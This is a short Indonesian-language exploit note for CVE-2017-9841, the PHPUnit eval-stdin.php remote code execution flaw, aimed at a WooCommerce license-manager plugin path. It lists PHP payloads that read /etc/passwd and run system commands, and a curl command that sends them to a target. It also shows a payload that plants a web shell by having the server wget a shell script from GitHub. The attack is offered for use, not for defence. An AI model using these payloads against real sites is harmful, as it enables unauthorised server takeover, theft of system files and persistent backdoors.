vulnerability PHP unit RCE in woocomerce

Laravel PHPUnit Remote Code Execution .

CVE-2017-9841

vulnerability PHP unit RCE in woocomerce 

Biasa nya file nya terletak di  : /wp-content/plugins/woocommerce-software-license-manager/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Celah ini sebenarnya terletak pada vendor third party yakni PHPUnit, bukan dari Laravelnya.

Disini kita bebas untuk mengirim datanya menggunakan curl 

Pakai parameter -d  untuk mengirim payloadnya. 

Contoh payloadnya :

<?php system('tail /etc/passwd'); ?> 

<?php echo php_uname(); ?>

 <?php show_source('/etc/passwd'); ?>

Contoh command :

curl -d "<?php echo php_uname(); ?>" http://webtarget/wp-content/plugins/woocommerce-software-license-manager/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Kalau mau nanem shell tinggal diubah payloadnya menjadi wget misal :

<?php system('wget https://raw.githubusercontent.com/holiq/IndoSec-sHell/master/ids.php'; ?>

Maaf gak ada contoh males dorking:V